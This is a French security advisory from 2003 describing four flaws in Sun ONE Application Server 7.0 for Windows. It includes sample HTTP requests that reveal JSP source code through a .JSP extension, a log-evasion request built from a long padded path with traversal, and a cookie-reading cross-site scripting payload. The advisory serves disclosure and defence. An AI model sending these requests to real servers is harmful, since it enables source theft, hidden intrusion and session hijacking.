Date de Publication: 2003-05-28
 Titre: Sun-One Application Server Multiple Vulnerabilities
 K-Otik ID : 0121
 Exploitable à distance : Oui
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
Plusieurs vulnérabilités critiques touchent Sun-ONE Application Server sous Windows. La première est de type "JSP source code disclosure" : un attaquant peut voir les codes sources d'une application JSP en changeant l'extension de .jsp en .JSP.

[Requête Normale]
GET /hello.jsp HTTP/1.0

[Réponse]
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is Fri March 14 15:29:40 EST 2003 and is a beautiful Spring day.
</body></html>

[Requête .JSP]
GET /hello.JSP HTTP/1.0

[Réponse]
HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0
(more headers)

<html>
<head><title>Hello World JSP Example</title></head>
<body>
<h1>Hello World</h1>
It is <%= new java.util.Date().toString() %> and is a beautiful Spring
day.
</body></html>

La seconde faille est de type "Log evasion", elle permettrait à un attaquant de faire des requêtes qui ne seront pas logguées, puisque le serveur ne log que les 4042 premiers caractères d'une requête

[Requête /hello.jsp]
GET /AAAAAAAAAAAAAA[ plus de 4042 caractères]/../hello.jsp HTTP/1.0

[Le Fichier log]
172.16.10.47 - - [04/Mar/2003:10:52:04 -0800] "GET /AAAAAAAAAA[plus de 4042 caractères] ...

La troisième faille de sécurité (moins grave) est de type Cross Site Scripting :
/webapps-simple/jsp/source.jsp?<script>alert(document.cookie)</script>

La dernière vulnérabilité quant à elle, est de type "plaintext passwords" : le nom d'utilisateur et le mot de passe sont stockés lors de l'installation dans le fichier "statefile" en texte clair.


  * Versions Vulnérables *

Sun-ONE Application Server 7.0 pour Windows 2000/XP


  * Solution *

Aucune solution officielle pour l'instant.


  * Crédits *
 
Faille découverte par l'équipe de SPI Dynamics (Mai 2003).